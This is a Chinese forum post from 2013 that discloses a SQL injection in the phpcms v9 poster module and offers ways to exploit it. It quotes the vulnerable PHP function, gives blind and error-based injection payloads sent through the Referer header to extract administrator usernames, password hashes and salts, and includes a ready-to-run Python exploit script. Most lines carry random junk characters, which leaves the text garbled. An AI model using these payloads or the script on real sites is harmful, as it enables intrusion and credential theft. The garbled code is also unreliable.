有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:0 B# c$ L, x! f+ a
& u# G6 @4 C' I) G$ ?0 Z: n; R, k
问题函数\phpcms\modules\poster\index.php
; v2 D; n4 t" p" T! `' ?
8 D5 x( _; `( Bpublic function poster_click() {# z5 M, d* j5 \
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;: Y+ S# Q! [3 l. h0 d! q2 U6 `( N
$r = $this->db->get_one(array('id'=>$id));
( U" P0 r" C# [$ s: bif (!is_array($r) && empty($r)) return false;# c: l$ ~4 v) o" I# Q) {
$ip_area = pc_base::load_sys_class('ip_area');
7 S k4 ~, O) u2 p+ p$ip = ip();
7 W" I/ w- O, W4 W9 y$area = $ip_area->get($ip);
- a) G. q/ H4 A F% @; c" h! S/ B) u4 R$username = param::get_cookie('username') ? param::get_cookie('username') : '';
4 P @/ R3 F' g6 w# _if($id) {% {, a: V" {: M; Y
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
# k2 [5 q. Y. c% `% K2 N' v$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) o6 {$ m9 |" t% p; G" ~- B}( j) K8 q V/ A- W2 Z
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
! N( o" b8 K0 v3 P5 f$setting = string2array($r['setting']);1 w8 N3 `" {2 \7 d0 U& r6 j4 r
if (count($setting)==1) {( V1 ^: l: @: e9 W5 X; ]( w
$url = $setting['1']['linkurl'];
/ s0 g( C5 x* Z9 `$ o- x. Z j} else {
7 l6 }& l8 O! f% Z$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
. |" _* m- ]" x0 E5 g. E}* ^$ K" A$ F& [' x9 i6 K8 S
header('Location: '.$url);
8 m4 r& y |5 g( q}+ k" z% S- o* g' v
9 o2 v+ ^$ V- g# `) L* g2 n" V$ m
! h2 j6 E4 z: J. b1 W% B' ?
8 A. H; U) _- V9 G, G5 f. ?2 U利用方式:
& I" r# R1 R" l; I: A$ D' D; S0 q4 @& B; E. U) V. C- r
1、可以采用盲注入的手法:0 Y, z8 U) S( N; {
: u/ l$ c/ _+ Y5 |' } t( L7 ]
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#3 r2 _; a9 i5 j6 H1 l, I" ]
* @+ p3 C8 t' L! {, }( r7 r. t
通过返回页面,正常与否一个个猜解密码字段。1 I$ }3 X4 z$ r) n. C" c' v* }( B
! d0 x$ k% A1 T8 s7 ]2、代码是花开写的,随手附上了:, c7 n2 x" v" M5 B9 t7 Z% J. n
9 V4 m- Y" A# e5 g0 o* _
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
: c: }. q) p8 x* l8 y/ v, P( @; j1 c- S
此方法是爆错注入手法,原理自查。
; r3 }. e+ ]* k& x8 {. @& ~) V& d. }/ n$ v
" O! M" W) a' Y/ ?
2 B5 B3 a# s" y4 ?5 L
利用程序:4 b0 O. B0 ^- h8 D3 D) P
% C, f0 S) q- ^6 |6 J8 t
#!/usr/bin/env python/ k5 S3 @& i: q' |: ^3 x: h! b
import httplib,sys,re- A3 j5 d- n; ?8 h
9 E$ c+ ]1 O6 a# w2 u7 x/ n! [4 l
def attack():
/ y( T& p! L. s5 ?5 I( w3 nprint “Code by Pax.Mac Team conqu3r!”7 ~1 O s9 Y% Z1 H
print “Welcome to our zone!!!”3 ~# c3 _9 t6 C; N$ V# A
url=sys.argv[1]
" c- U4 q7 N" _" zpaths=sys.argv[2]
& G! F4 Q5 `' C! k K/ E" g% f5 }6 yconn = httplib.HTTPConnection(url)
! ^) `( k; y+ W, L7 R5 Ji_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
9 Y" S$ j# A2 A1 Q" M* c0 j“Accept”: “text/plain”,' L) T8 m) z( I- f1 A0 l$ f
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
; [9 O6 L* f0 G4 Pconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)/ Q( v: @4 B$ f! g1 L# g
r1 = conn.getresponse()) ]) x1 m1 r# W9 {
datas=r1.read()2 V% h/ w& R |" o0 e
datas=re.findall(r”Duplicate entry \’\w+’”, datas)4 E L/ U% m8 M% i2 S6 C4 g
print datas[0]
# y2 _# H6 W# n8 C9 R. x; J: sconn.close()% _ o/ A% z9 l9 w# R
if __name__==”__main__”:1 h1 m& w6 _6 d
if len(sys.argv)<3:; R' N7 J. L/ p$ g, E7 X
print “Code by Pax.Mac Team conqu3r”$ ]' ? q* k4 {2 w# d' S: x# ]
print “Usgae:”
7 _5 X$ w" U4 V& L: h- |8 G/ rprint “ phpcmsattack.py www.paxmac.org /”
' L3 ]. T/ x3 T( rprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
! o- p5 N1 t. D" ~% n, Fsys.exit(1)
/ t3 p$ E* {' X/ c1 q2 _1 P7 T+ @attack()! M* |. w) h# e: n3 K% s
2 \2 }/ U# p. k |
发表于 2013-1-11 21:01:00
收藏
支持
反对